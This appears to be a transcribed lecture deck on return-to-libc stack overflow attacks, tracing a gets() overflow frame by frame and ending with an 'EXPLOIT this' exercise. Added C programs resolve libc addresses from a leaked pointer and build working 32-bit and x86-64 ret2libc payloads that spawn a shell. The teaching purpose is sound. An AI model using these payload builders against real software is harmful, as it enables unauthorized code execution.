
Return to libc attack

1. Return-into-library attack (return to libc attack)

2. What is libc ?

Memory map of a dynamically linked process: three separately loaded modules, each with its own base address.
55cdfefe3000  Prog.elf
7f11866a7000  libc.so
7f1186c82000  ld-linux-x86-64.so

3. What is libc ?

The same map with the sections of each module: the library is a complete ELF object with its own code and data, laid out relative to its own base.
55cdfefe3000  Prog.elf: .text .data .bss .plt
7f11866a7000  libc.so:  .text .data .bss .plt

4. What is libc ?

// Your program
main:
    call printf     ; the call goes to the PLT stub in your binary
    ret
plt:
    jmp printf      ; the stub jumps into libc.so
// libc.so
printf:
    ...
    ret
puts:
    ...
    ret
system:
    ...
    ret

5. ret2libc

What the attack needs:
1. We know the version (build) of libc.so
2. We know the address of libc.so (its load base)
3. We know the address of any one function in libc.so

6. ret2libc

int main (){
char buf [16];
gets(buf);
}

Stack frame of main, from low to high addresses:
char buf[16]
ebp before main (saved ebp)
ret from main

7.

ret2libc
(Slides 7 to 15 are animation frames of one slide: the code on the left stays the same, the "eip" marker moves down one instruction per frame, and the stack drawing on the right fills in. The code is given once here; each frame below lists only the eip position and the stack.)

main:
1. push ebp
2. mov ebp, esp
3. sub esp, 16
4. lea edx, buf
5. push edx
6. call gets
7. add esp, 4
8. leave
9. ret
…………………………………….
10. system:
11.
12. ret
13. printf:
14.
15. ret

.stack ; segment with stack, drawn as numbered 4-byte slots; slot 1 is the lowest address, slot 9 the highest

eip at 1 (push ebp):
  9  ret from main

8.

eip at 2 (mov ebp, esp):
  8  old ebp
  9  ret from main

9.

eip at 3 (sub esp, 16); ebp = slot 8:
  8  old ebp          <- ebp
  9  ret from main

10.

eip at 4 (lea edx, buf); 16 bytes reserved, slots 4 to 7 are char buf[16]:
  4  char buf[16]     <- esp
  5  (buf)
  6  (buf)
  7  (buf)
  8  old ebp          <- ebp
  9  ret from main

11.

eip at 5 (push edx); edx = address of slot 4 (the start of buf). Stack unchanged.

12.

eip at 6 (call gets); the pointer to buf has been pushed as the argument:
  3  pointer to buf (edx = 4)   <- esp
  4  char buf[16]
  5  (buf)
  6  (buf)
  7  (buf)
  8  old ebp                    <- ebp
  9  ret from main

13.

eip at 7 (add esp, 4), after gets returned. The input was longer than 16 bytes ("AAAA..."), and gets has no length check, so it wrote past buf over the saved ebp and the return address:
  4  AAAA
  5  AAAA
  6  AAAA
  7  AAAA
  8  old ebp | AAAA
  9  ret from main | AAAA

14.

eip at 8 (leave): same stack; leave is about to do mov esp, ebp / pop ebp.

15.

eip at 9 (ret), after leave: ebp = AAAA (0x41414141), esp points at slot 9. If the attacker placed the address of system in the overflow instead of AAAA, ret will jump there:
  9  ret from main | system (the slide labels it "syscall")

16.

system = ?

17.

system = printf - CONST

18.

system =libc.so:system
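An added example (not code from the slides) of the two steps slides 16 to 18 compress into "system = printf - CONST": locate the libc load base in /proc/PID/maps text, then turn one known libc address into any other using offsets fixed by the libc build. The maps text and the symbol offsets below are constructed placeholders; real offsets come from `readelf -s` or `nm -D` on the target's libc.so.6.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample of /proc/<pid>/maps output, in the layout slide 2 draws
 * (base addresses taken from the slide; paths are made up for the example). */
const char *SAMPLE_MAPS =
    "55cdfefe3000-55cdfefe4000 r--p 00000000 08:01 1 /home/user/Prog.elf\n"
    "55cdfefe4000-55cdfefe5000 r-xp 00001000 08:01 1 /home/user/Prog.elf\n"
    "7f11866a7000-7f11866c9000 r--p 00000000 08:01 2 /usr/lib/x86_64-linux-gnu/libc.so.6\n"
    "7f11866c9000-7f1186841000 r-xp 00022000 08:01 2 /usr/lib/x86_64-linux-gnu/libc.so.6\n"
    "7f1186c82000-7f1186c83000 r--p 00000000 08:01 3 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\n";

/* Constructed symbol offsets for one hypothetical libc build (placeholders,
 * not real values; on a real target read them from that build's libc.so.6). */
enum { OFF_PUTS = 0x84420, OFF_PRINTF = 0x61c90, OFF_SYSTEM = 0x52290, OFF_BINSH = 0x1b45bd };

/* Base address of libc from maps text: the start of the first mapping whose
 * file name is libc.so* or libc-*.so. glibc's first segment sits at file
 * offset 0, so that start is the load base. Returns 0 if no libc is mapped. */
uintptr_t parse_libc_base(const char *maps)
{
    while (maps && *maps) {
        const char *eol = strchr(maps, '\n');
        size_t len = eol ? (size_t)(eol - maps) : strlen(maps);
        char line[512];
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, maps, len);
        line[len] = '\0';
        const char *name = strrchr(line, '/');          /* last path component */
        if (name && (strncmp(name, "/libc.so", 8) == 0 || strncmp(name, "/libc-", 6) == 0))
            return (uintptr_t)strtoull(line, NULL, 16); /* "start-end ..." */
        maps = eol ? eol + 1 : NULL;
    }
    return 0;
}

/* Slide 17 generalised: ASLR moves the whole library, so the distance between
 * two symbols is a per-build constant. One leaked address plus the build's
 * offsets yields every other address in libc. */
uintptr_t resolve_symbol(uintptr_t leaked_addr, uintptr_t leaked_off, uintptr_t target_off)
{
    return (leaked_addr - leaked_off) + target_off;
}

/* Worked case on the constructed data: libc base from SAMPLE_MAPS, a printf
 * address derived from it standing in for a leaked pointer, then system. */
uintptr_t demo_system_from_printf(void)
{
    uintptr_t base = parse_libc_base(SAMPLE_MAPS);
    uintptr_t printf_leak = base + OFF_PRINTF;
    return resolve_symbol(printf_leak, OFF_PRINTF, OFF_SYSTEM);
}

int main(void)
{
    /* Live run on this process: the same text `cat /proc/[PID]/maps` shows. */
    static char maps[1 << 16];
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f) { perror("/proc/self/maps"); return 1; }
    size_t n = fread(maps, 1, sizeof maps - 1, f);
    fclose(f);
    maps[n] = '\0';
    uintptr_t base = parse_libc_base(maps);
    /* In a PIE executable (the usual gcc default) &puts is libc's address; a
     * non-PIE build gives the PLT stub inside the executable instead. */
    printf("libc base %#lx, puts at %#lx, system at %#lx\n",
           (unsigned long)base, (unsigned long)(uintptr_t)puts,
           (unsigned long)(uintptr_t)system);
    printf("system - puts = %#lx (constant across runs; only the base moves)\n",
           (unsigned long)((uintptr_t)system - (uintptr_t)puts));
    printf("constructed sample: system at %#lx\n", (unsigned long)demo_system_from_printf());
    return 0;
}
```

Run it twice with randomize_va_space at 2 and the base changes while `system - puts` does not; with it at 0 the base is the same on every run, which is what the deck's fixed addresses rely on.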

19.

ret2libc
(Same frame as slide 15, repeated after the "system = ?" digression: eip at 9, ret, ebp = AAAA, and slot 9 now holds the address of system in place of "ret from main".)

20.

ret2libc
eip at 10 (system:). ret popped the overwritten return address, so execution continues at the start of libc's system; esp now points at slot 10. ebp is still AAAA. The drawing extends the stack to slots 1 to 11.

21.

ret2libc
Stack as system sees it on entry (slots 4 to 11 were all written by the one gets() call):
  4  AAAA                   char buf[16], filler
  5  AAAA
  6  AAAA
  7  AAAA
  8  AAAA                   old ebp (ebp is now 0x41414141)
  9  address of system      was "ret from main"; the slide labels it "syscall"   <- consumed by ret
  10 ret from system        where system will return once the shell exits      <- esp
  11 ref to "/bin/sh"       the argument, read by system at [esp+4]
.stack ; segment with stack

22. Where is /bin/sh ?

23. Where is /bin/sh ?

ropchain
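An added example (not code from the slides) that builds the overflow input slide 21 draws for `char buf[16]`, and, going beyond the deck's 32-bit picture, the x86-64 form hinted at by slide 23's "ropchain", where the argument to system must travel in rdi through a `pop rdi; ret` gadget. All addresses are constructed placeholders; the real ones come from the GDB commands of slide 28 (with randomization off) or from a leak.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Write v as `width` little-endian bytes (x86 and x86-64 are little-endian). */
static size_t put_le(uint8_t *out, uint64_t v, size_t width)
{
    for (size_t i = 0; i < width; i++)
        out[i] = (uint8_t)(v >> (8 * i));
    return width;
}

/* 32-bit x86, cdecl: exactly the slide 21 layout.
 *   [buf_size bytes filler][4 bytes saved ebp][system][ret for system][ptr to "/bin/sh"]
 * On entry system reads its argument at [esp+4], so the word after its
 * address is where it returns and the word after that is its argument.
 * Returns the payload length. */
size_t build_ret2libc_x86(uint8_t *out, size_t buf_size, uint32_t system_addr,
                          uint32_t ret_after_system, uint32_t binsh_addr)
{
    size_t n = buf_size + 4;                   /* buf + saved ebp (becomes 0x41414141) */
    memset(out, 'A', n);
    n += put_le(out + n, system_addr, 4);      /* replaces "ret from main" */
    n += put_le(out + n, ret_after_system, 4); /* "ret from system" on the slide */
    n += put_le(out + n, binsh_addr, 4);       /* "ref to /bin/sh" */
    return n;
}

/* x86-64 SysV: the first argument goes in rdi, not on the stack, so one
 * gadget is needed (the "ropchain" of slide 23):
 *   [filler][8 bytes saved rbp][pop rdi; ret][ptr to "/bin/sh"][ret][system]
 * The lone `ret` gadget realigns rsp to 16 bytes before system runs, which
 * glibc's system needs for its SSE (movaps) instructions. */
size_t build_ret2libc_x64(uint8_t *out, size_t buf_size, uint64_t pop_rdi_ret,
                          uint64_t binsh_addr, uint64_t ret_gadget, uint64_t system_addr)
{
    size_t n = buf_size + 8;
    memset(out, 'A', n);
    n += put_le(out + n, pop_rdi_ret, 8);
    n += put_le(out + n, binsh_addr, 8);
    n += put_le(out + n, ret_gadget, 8);
    n += put_le(out + n, system_addr, 8);
    return n;
}

/* gets() copies NUL bytes but stops at '\n' (0x0a): any address that contains
 * a 0x0a byte truncates the payload. Returns the offset of the first 0x0a, or -1. */
long first_newline(const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == '\n') return (long)i;
    return -1;
}

int main(void)
{
    /* Placeholder addresses (constructed). The return address after system is
     * arbitrary here; the shell runs before it is ever used. */
    uint8_t payload[64];
    size_t n = build_ret2libc_x86(payload, 16, 0xf7e0c4d0u, 0x41414141u, 0xf7f5a0cfu);
    if (first_newline(payload, n) >= 0) {
        fprintf(stderr, "payload contains 0x0a; gets() would cut it short\n");
        return 1;
    }
    fwrite(payload, 1, n, stdout);
    putchar('\n');   /* terminates gets(); the trailing cat below keeps stdin open */
    return 0;
}
```

Usage against the slide 29 program, built 32-bit with randomization off: `./build_payload > payload.bin` then `(cat payload.bin; cat) | ./test`; the second cat keeps stdin open so the spawned shell has something to read.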

24. What about randomization

/proc/sys/kernel/randomize_va_space
0 – No randomization. Everything is static.
1 – Conservative randomization. Shared libraries,
stack, mmap(), VDSO and heap are randomized.
2 – Full randomization. In addition to elements listed
in the previous point, memory managed through
brk() is also randomized.

25. Static compile

Before: the dynamically linked layout of slide 2, three modules at three bases.
55cdfefe3000  Prog.elf
7f11866a7000  libc.so
7f1186c82000  ld-linux-x86-64.so

26. Static compile (-s)

After: the figure folds the libc.so and ld-linux-x86-64.so boxes into Prog.elf. There is a single module; the library code the program uses is copied into the executable itself.

27. Static compile (-s)

1. Works on any Linux with any libc installed (no dependency on the system's libc at run time)
2. The ELF contains the entire libraries
3. Very big binary
4. You can find many functions and gadgets in it - dangerous: the binary itself now supplies the system() and the gadgets that ret2libc needs, at fixed addresses unless it is built as PIE
(The gcc flag that links statically is -static; -s only strips the symbol table.)

28. GDB commands

gdb:
maint info sections – show the sections of the binary
shell ps aux | grep test – show the process pid
shell cat /proc/[PID]/maps – show the mappings of the process (inside gdb, info proc mappings gives the same)
find [START ADDRESS], [END ADDRESS], "[STRING]" – search memory, e.g. for "/bin/sh" inside the libc mapping
shell:
ldd test – list the shared libraries the binary loads

29. Now

#include <stdio.h>
int main(){
char buf[16];
gets(buf);
puts(buf);
return 0;
}
EXPLOIT this